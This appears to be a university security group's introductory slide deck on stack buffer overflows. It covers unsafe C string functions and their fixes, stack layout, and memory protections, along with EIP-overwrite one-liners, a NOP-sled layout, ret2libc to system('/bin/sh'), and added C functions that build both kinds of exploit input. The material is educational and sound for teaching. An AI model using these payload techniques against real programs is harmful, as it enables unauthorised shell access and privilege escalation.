
Page 1: Intro to Exploitation Stack Overflows

Intro to Exploitation Stack Overflows

James McFadyen UTD Computer Security Group

10/20/2011

Page 2

Intro to Exploitation

Only an intro to stack overflows
Basic theory and application
One of many types of exploitation

Page 3

Outline

What is a buffer overflow?
Tools
Vulnerable C functions
Remember the memory
Learn to love assembly
Stack overflow
Protection mechanisms
ret2libc in Linux

Page 4

Buffer Overflow

“In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety.” - Wikipedia

Page 5

Buffer Overflow

In our examples..
Give the program too much input and hijack the instruction pointer (EIP)
Control EIP
Execute arbitrary code, locally or remotely
Achieve what we want as an elevated user

Page 6

Tools

Linux: GDB, gcc, vi, perl/python/ruby, readelf, objdump, ltrace, strace, ropeme

Windows: WinDBG, OllyDBG, ImmunityDBG, IDA, Python, Mona (ImmunityDBG plugin)

Page 7

Vulnerable C Code

strcpy(), strncpy()
strcat(), strncat()
sprintf(), snprintf()
gets()
sscanf()
Many others...

The unbounded ones (strcpy, strcat, sprintf, gets) never look at the destination size. The bounded variants are only safe when the size argument is right; the next slides show how they are commonly misused.

Page 8

Vulnerable C Code

strcpy() doesn't check the destination size. If we have

char buf[128];

strcpy(buf, userSuppliedString);

then any userSuppliedString of 128 bytes or more (counting the terminator) is copied straight past the end of buf into whatever follows it on the stack. This makes it too easy...

Page 9

Vulnerable C Code

char *strncpy(char *dest, const char *src, size_t n);

We have a size, but what if..

strncpy(somebuffer, str, strlen(str));

The bound is the source length, not the destination size, so a long str overflows somebuffer exactly like strcpy() would. Or..

strncpy(somebuffer, str, sizeof(somebuffer));

This one does not overflow, but if str is sizeof(somebuffer) bytes or longer, strncpy writes no NUL terminator at all, and the next strlen(), strcat() or printf("%s") on somebuffer reads past its end. Note also that sizeof(somebuffer) is only the buffer size when somebuffer is an array; if it is a pointer, sizeof gives the pointer size (4 or 8). In both cases str is supplied by the user.

Page 10

Vulnerable C Code

Common bug, proper fix:

strncpy(somebuffer, str, sizeof(somebuffer)-1);
somebuffer[sizeof(somebuffer)-1] = '\0';

The explicit terminator is part of the fix: strncpy() only NUL-terminates when str is shorter than n, so leaving n-1 bytes of room and setting the last byte yourself is what guarantees a valid string. Better still, check strlen(str) against the buffer first and reject oversized input instead of silently truncating it.

Page 11

Vulnerable C Code

char *strncat(char *dest, const char *src, size_t n);

Ex:

void vulnerable(char *str1, char *str2)
{
    char buf[256];

    /* copies up to 100 bytes; buf is not terminated if str1 is 100+ bytes */
    strncpy(buf, str1, 100);

    /* n is the number of bytes to APPEND from str2, not the space left in buf:
       up to 100 (already there) + 255 (appended) + 1 (NUL) = 356 bytes into a
       256-byte buffer */
    strncat(buf, str2, sizeof(buf)-1);
}

Page 12

Vulnerable C Code

Fix: strncat(buf, str2, sizeof(buf) - strlen(buf) - 1);

strncat()'s size argument is how many bytes to append, not the size of dest, so the space already used by buf has to be subtracted, and one more byte reserved for the terminator strncat() always writes. This only works if buf is NUL-terminated before strlen(buf) is called on it, which the strncpy() on the previous slide does not guarantee.
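The strncpy()/strncat() pitfalls from the last few slides, as an added example that is not part of the original deck. bounded_copy() and bounded_append() are hypothetical helpers (not a libc API) that always leave the destination NUL-terminated and report truncation; strncpy_leaves_unterminated() and fixed_strncat_len() reproduce the slide's bug and fix on small buffers sized only for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not libc): copy src into dst[dstsz], always
 * NUL-terminating. Returns true if src was truncated, so callers can
 * reject oversized input instead of silently continuing. */
bool bounded_copy(char *dst, size_t dstsz, const char *src)
{
    if (dstsz == 0)
        return true;
    size_t srclen = strlen(src);
    size_t n = srclen < dstsz - 1 ? srclen : dstsz - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return srclen > n;
}

/* Hypothetical helper: append src to the string in dst[dstsz] with the
 * same contract. memchr bounds the search for the terminator, so an
 * unterminated dst is rejected rather than scanned off the end. */
bool bounded_append(char *dst, size_t dstsz, const char *src)
{
    const char *end = memchr(dst, '\0', dstsz);
    if (end == NULL)
        return true;                   /* dst unterminated: refuse */
    size_t used = (size_t)(end - dst);
    return bounded_copy(dst + used, dstsz - used, src);
}

/* Slide 9 bug: strncpy(buf, str, sizeof(buf)) with a source of
 * sizeof(buf) or more bytes writes no terminator at all.
 * Returns true if buf ended up without a NUL. */
bool strncpy_leaves_unterminated(const char *src)
{
    char buf[8];
    memset(buf, 'X', sizeof buf);      /* stand in for stack garbage */
    strncpy(buf, src, sizeof buf);
    return memchr(buf, '\0', sizeof buf) == NULL;
}

/* Slides 11-12: strncpy into buf, terminate explicitly, then the fixed
 * strncat bound sizeof(buf) - strlen(buf) - 1. Returns the final
 * length, which can never exceed sizeof(buf) - 1 == 15. */
size_t fixed_strncat_len(const char *str1, const char *str2)
{
    char buf[16];
    strncpy(buf, str1, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';        /* strncpy may not terminate */
    strncat(buf, str2, sizeof buf - strlen(buf) - 1);
    return strlen(buf);
}

/* Demo wrappers over an 8-byte destination so the results are scalars. */
size_t copy_into_small_buf(const char *src)
{
    char buf[8];
    bounded_copy(buf, sizeof buf, src);
    return strlen(buf);
}

size_t append_into_small_buf(const char *a, const char *b)
{
    char buf[8];
    bounded_copy(buf, sizeof buf, a);
    bounded_append(buf, sizeof buf, b);
    return strlen(buf);
}
```

The truncation flag is the important design point: a copy that "fits" by cutting user input short is still a bug in most programs (think of a truncated path or hostname), so the caller should check the return value and fail closed rather than treat truncation as success.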

Page 13

Remember the Memory

Low addresses
  Text   - code segment, machine instructions
  Data   - initialized global and static variables
  BSS    - uninitialized global and static variables
  Heap   - dynamic space: malloc(...) / free(...), new / delete
  Stack  - program scratch space: local variables, passed arguments, etc..
High addresses

* Taken from Mitchell Adair's "Stack Overflows"

Page 14

Remember the Memory: The Stack

High addresses
  ... previous stack frame
  arguments          EBP + x
  RET (saved EIP)    EBP + 4
  saved EBP          <- EBP
  local variables    EBP - x
  ...                <- ESP (top of stack)
Low addresses

* Taken from Mitchell Adair's "Stack Overflows"

Page 15

Love the Assembly

EIP – Extended Instruction Pointer: next instruction executed
ESP – Extended Stack Pointer: top of stack
EBP – Extended Base Pointer: base of the current stack frame
EAX – Accumulator register
EBX – Base register
ECX – Counter register
EDX – Data register
ESI – Source index
EDI – Destination index

* Taken from Mitchell Adair's "Stack Overflows"

Page 16

Stack Overflow

High
  *argv[]
  argc
  RET            4 bytes
  saved EBP      4 bytes    <- EBP
  char buf[100]  100 bytes  <- ESP
Low

* Taken from Mitchell Adair's "Stack Overflows"

Page 17

Stack Overflow

High
  *argv[]
  argc
  RET            4 bytes    <- overwritten with 0x41414141
  saved EBP      4 bytes    <- overwritten
  char buf[100]  100 bytes
Low

Input: 108 bytes of 0x41 ('A' * 108) fill buf (100), the saved EBP (4) and RET (4).

When the function returns, ret pops the overwritten return address off the stack into EIP.

EIP will now point to 0x41414141, which is normally unmapped, so the program segfaults with EIP under our control.

Ex: $ ./program $(python -c 'print "A" * 108')

(Python 2 print syntax. The 108 assumes buf sits directly below the saved EBP; compilers usually insert alignment padding, so in practice find the exact distance to RET in a debugger, e.g. by watching which part of the input shows up in EIP at the crash, rather than trusting the declared buffer size.)

* Taken from Mitchell Adair's "Stack Overflows"

Page 18

Stack Overflow

High
  *argv[]
  argc
  RET            4 bytes    <- 0xdeadbeef
  saved EBP      4 bytes
  char buf[100]  100 bytes
Low

Input: 104 bytes of 0x41 ('A' * 104) reach the end of the saved EBP; the next 4 bytes land in RET.

x86 is little-endian, so 0xdeadbeef is written least significant byte first: "\xef\xbe\xad\xde".

EIP will now point to 0xdeadbeef

We can now point EIP where we want

Ex: $ ./program $(python -c 'print "A" * 104 + "\xef\xbe\xad\xde"')

* Taken from Mitchell Adair's "Stack Overflows"

Page 19

Stack Overflow

$ ./program $(python -c 'print "A" * 104 + "\xef\xbe\xad\xde"')

We have 104 bytes before the return address for a payload

Payload can be anything, but for our purpose we would spawn a shell

The payload has a fixed size, so when we insert it we must reduce the number of A's by the size of the payload, so the address that follows still lands exactly on RET

Page 20

Stack Overflow

$ ./program $(python -c 'print "A" * 104 + "\xef\xbe\xad\xde"')

If we had a 32-byte payload.. (a real payload will not be a bunch of \xff)

$ ./program $(python -c 'print "A" * 72 + "\xff" * 32 + "\xef\xbe\xad\xde"')

72 + 32 = 104, so the buffer is adjusted to fit the payload and the next 4 bytes still overwrite RET. We then have to point EIP (\xef\xbe\xad\xde) to our payload on the stack

Page 21

Stack Overflow

$ ./program $(python -c 'print "A" * 72 + "\xff" * 32 + "\xef\xbe\xad\xde"')

"\xef\xbe\xad\xde" would be replaced with the address of our payload on the stack

EIP will now point to the address of our payload, which will spawn a shell

NOPs (0x90) in front of the payload create a bigger "landing area": any return address that lands inside the sled slides forward into the shellcode, so the guess does not have to be exact

When the input arrives through argv or a strcpy()-style copy, neither the payload nor the address may contain a 0x00 byte, since that ends the string and cuts the overwrite short

This technique is not very effective anymore... why?

Page 22

Protection Mechanisms (Windows)

DEP – Data Execution Prevention: marks data pages (stack, heap) non-executable, so shellcode placed on the stack can't run

/GS flag – the compiler places a cookie / canary between the local buffers and the saved EBP / return address and checks it before returning; a linear overwrite like the one above changes the cookie, is detected, and the process is terminated instead of returning into our address

SafeSEH – Structured Exception Handling protection: the linker records the valid exception handlers of each module and the OS refuses to dispatch to a handler address that is not in that list, so overwriting an SEH record on the stack no longer redirects execution

ASLR – Address Space Layout Randomization: randomizes the addresses of the stack, heap and loaded modules, so hard-coded addresses like the ones above change from run to run

Page 23

Protection Mechanisms (Linux)

NX – No-eXecute bit: a processor (page-table) feature; like DEP, data pages such as the stack can't be executed

Stack Smashing Protection – cookie / canary inserted by the compiler (gcc -fstack-protector); generally enabled by default in distribution toolchains

ASLR – Address Space Layout Randomization (controlled by /proc/sys/kernel/randomize_va_space)

Many other compiler and loader protections (FORTIFY_SOURCE, RELRO, PIE, ...)

The stack-shellcode attack above relies on all of these being off.

Page 24

ret2libc

Bypasses NX: instead of executing code we placed on the stack, point EIP at a function that is already mapped executable in libc

system(), execve(), etc... e.g. system("/bin/sh");

We will get a shell by returning into libc's system() with "/bin/sh" as its argument

Page 25

ret2libc

$ ./program $(python -c 'print "A" * 104 + "\xef\xbe\xad\xde"')

We don't need the payload where the A's are anymore

On 32-bit x86 (cdecl) a function entered via ret sees its return address at [ESP] and its first argument at [ESP+4]. So we overwrite RET with the address of system(); the next 4 bytes are the address system() will return to when the shell exits (exit() for a clean exit, or anything if a crash afterwards is acceptable); the next 4 bytes are system()'s argument: the address of a "/bin/sh" string, not the string bytes themselves (the string can be found inside libc or placed in an environment variable we control)

$ ./program $(python -c 'print "A" * 104 + address_of_system + return_address + address_of_binsh')

All three are 4-byte little-endian values read from gdb; with ASLR on they change every run, so this demo assumes it is disabled
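Building the two kinds of input described on slides 17-21 and 24-25, as an added example that is not part of the original deck. It assumes the slides' 32-bit frame with no padding between buf and the saved EBP (so RET starts at offset 104); the addresses used in the demo wrappers and tests (0xb7e5e190 and so on) are placeholders standing in for values read from gdb on the target, and build_stack_payload() / build_ret2libc() are hypothetical names.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Frame assumed by the slides: [char buf[100]][saved EBP][RET], with no
 * compiler padding, so the return address starts at byte 104. */
#define RET_OFFSET 104u
#define NOP        0x90   /* x86 one-byte nop, used for the sled */

/* Write v as four little-endian bytes: 0xdeadbeef -> ef be ad de. */
static void le32(uint8_t *out, uint32_t v)
{
    out[0] = (uint8_t)(v);
    out[1] = (uint8_t)(v >> 8);
    out[2] = (uint8_t)(v >> 16);
    out[3] = (uint8_t)(v >> 24);
}

/* Input delivered through argv/strcpy() stops at the first 0x00, so a
 * NUL anywhere before the end would cut the overwrite short. */
static bool has_nul(const uint8_t *p, size_t n)
{
    return memchr(p, 0, n) != NULL;
}

/* Slides 17-21: [NOP sled][payload][RET -> somewhere in the sled].
 * Returns bytes written, or 0 if the payload does not fit or a NUL
 * would truncate the input. */
size_t build_stack_payload(const uint8_t *payload, size_t payload_len,
                           uint32_t ret_addr, uint8_t *out, size_t out_cap)
{
    size_t total = RET_OFFSET + 4;
    if (payload_len > RET_OFFSET || out_cap < total)
        return 0;
    size_t sled = RET_OFFSET - payload_len;
    memset(out, NOP, sled);
    memcpy(out + sled, payload, payload_len);
    le32(out + RET_OFFSET, ret_addr);
    return has_nul(out, total) ? 0 : total;
}

/* Slides 24-25: [filler][&system][address system() returns to][&"/bin/sh"].
 * After ret pops &system into EIP, ESP points at the next word, which
 * system() treats as its own return address, and the word after that as
 * its first argument (cdecl): a pointer to "/bin/sh", not the string. */
size_t build_ret2libc(uint32_t system_addr, uint32_t after_addr,
                      uint32_t binsh_addr, uint8_t *out, size_t out_cap)
{
    size_t total = RET_OFFSET + 12;
    if (out_cap < total)
        return 0;
    memset(out, 'A', RET_OFFSET);
    le32(out + RET_OFFSET, system_addr);
    le32(out + RET_OFFSET + 4, after_addr);
    le32(out + RET_OFFSET + 8, binsh_addr);
    return has_nul(out, total) ? 0 : total;
}

/* The 32-bit little-endian word at off, i.e. what ret would load into
 * EIP from that stack slot. */
uint32_t word_at(const uint8_t *in, size_t off)
{
    return (uint32_t)in[off] | (uint32_t)in[off + 1] << 8 |
           (uint32_t)in[off + 2] << 16 | (uint32_t)in[off + 3] << 24;
}

/* Demo: build a slide-20 style input with payload_len stand-in bytes
 * (0xff, as on the slide) and return the word that lands in RET. */
uint32_t demo_eip_after_overflow(uint32_t ret_addr, size_t payload_len)
{
    uint8_t in[RET_OFFSET + 4], payload[RET_OFFSET];
    memset(payload, 0xff, sizeof payload);
    size_t n = build_stack_payload(payload, payload_len, ret_addr, in, sizeof in);
    return n ? word_at(in, RET_OFFSET) : 0;
}

/* Demo: total length of a ret2libc chain, 0 if an address contains a NUL.
 * Placeholder addresses only; real ones come from gdb on the target. */
size_t demo_ret2libc_len(uint32_t system_addr, uint32_t after_addr,
                         uint32_t binsh_addr)
{
    uint8_t in[RET_OFFSET + 12];
    return build_ret2libc(system_addr, after_addr, binsh_addr, in, sizeof in);
}
```

Against a real target you would replace the placeholders with what gdb reports (p system, p exit, and a search for the "/bin/sh" string in libc) and write the returned bytes to a file or pass them as the argument. The NUL check is why an address whose low byte happens to be 0x00 (common for page-aligned code addresses such as 0x08048000) cannot be delivered through argv or a strcpy()-style copy; the input would simply end there.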

Page 26

Demo!

How to use GDB for exploitation
Exploring the stack
Finding important memory addresses (ret2libc)
Breakpoints
Using Perl/Python/Ruby for arguments in GDB
Basic stack overflow
ret2libc

Page 27

Additional Resources

https://www.corelan.be/index.php/articles/
http://beej.us/guide/bggdb/
http://en.wikibooks.org/wiki/X86_Assembly
http://www.alexonlinux.com/how-debugger-works
http://smashthestack.org/
http://intruded.net/

Page 28

Sources

"Source Code Auditing" - Jared Demott
"Smashing the stack in 2010" - Andrea Cugliari + Mariano Graziano
"Stack Overflows" - Mitchell Adair
http://en.wikipedia.org/wiki/Buffer_overflow
http://en.wikipedia.org/wiki/Return-to-libc_attack